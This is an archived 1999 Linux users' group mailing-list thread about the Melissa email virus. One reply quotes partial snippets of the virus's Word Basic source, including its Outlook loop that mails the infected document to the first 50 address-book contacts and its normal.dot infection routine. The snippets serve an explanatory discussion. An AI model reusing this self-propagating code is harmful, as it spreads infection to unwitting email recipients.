Complete.Org: Mailing Lists: Archives: discussion: April 1999:
Re: [aclug-L] Snap:News & Media:Top Stories:Mutating E-Mail Virus

To: Linux users group questions <aclug-L@xxxxxxxxxxxx>
Subject: Re: [aclug-L] Snap:News & Media:Top Stories:Mutating E-Mail Virus
From: "Clint A. Brubakken" <cabrubak@xxxxxxxxxxx>
Date: Thu, 1 Apr 1999 10:01:49 -0600 (EST)

On Thu, 1 Apr 1999, Jeff wrote:
> On Thu, 1 Apr 1999, Clint A. Brubakken wrote:
>
> > On Thu, 1 Apr 1999, Jeff wrote:
> >
> > > melissa only infects Outlook users.
> >
> > Not exactly, it will infect any computer if opened in Word 97. I'm not
> > sure about sending it to your first 50 email addresses, as I assume It
> > uses Outlooks mailbox to send them.
>
> Well, ok, yes. It also affects "office 2000". I assumed that most people
> using Windows to read email would be using Outlook.  The upshot is that if

I try not to understand the average Windows user, it makes my brain hurt.

> > Besides Sending mail, does anyone know what else the virus does? I've
> > never heard that.
>
> It infects 'normal.dot', and so any new document created using that
> template will be infected (and so when the next person opens it, etc).
> There's also the neat behavior if the current minute == the current month,
> it ... well, here's snippets from the code:

So If I understand the code correctly, all it does is try to infect
everyone, and print a message once a mounth? Or is there something
maliscious there I don't understand, because I don't now Word Basic.

> <snip>
>
> Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
> Set UngaDasOutlook = CreateObject("Outlook.Application")
>   If UngaDasOutlook = "Outlook" Then
>     DasMapiName.Logon "profile", "password"
>     For y = 1 To DasMapiName.AddressLists.Count
>         Set AddyBook = DasMapiName.AddressLists(y)
>         x = 1
>         Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
>         For oo = 1 To AddyBook.AddressEntries.Count
>             Peep = AddyBook.AddressEntries(x)
>             BreakUmOffASlice.Recipients.Add Peep
>             x = x + 1
>             If x > 50 Then oo = AddyBook.AddressEntries.Count
>          Next oo
>          BreakUmOffASlice.Subject = "Important Message From " &
>              Application.UserName
>          BreakUmOffASlice.Body = "Here is that document you asked for ...
> don't
>  show anyone else ;-)"
>          BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
>          BreakUmOffASlice.Send
>          Peep = ""
>
> <snip>
>
> Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
> Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
>
> <snip>
>
> If NTI1.Name <> "Melissa" Then
>   If NTCL > 0 Then NTI1.CodeModule.DeleteLines 1, NTCL
>   Set ToInfect = NTI1
>   NTI1.Name = "Melissa"
>   DoNT = True
> End If
>
> 'WORD/Melissa written by Kwyjibo
> 'Works in both Word 2000 and Word 97
> 'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
> 'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
>
> If Day(Now) = Minute(Now) Then Selection.TypeText " Twenty-two points, plus
> tri
> ple-word-score, plus fifty points for using all my letters.  Game's over.  I'm
> outta here."
> End Sub
>
> <snip>
>

> > In addition linux is rather invulrable to viruses as programs run an as a
> > non-priveleged user do not have total access to the system.
>
> Short of DOS attacks & the like, yes.

Dos attacks? I got into the computer game kinda late, what exactly is
that?

| The Cheez-Czar  http://www.hackboy.com/~cabrubak    |
Military justice is to justice what military music is to music.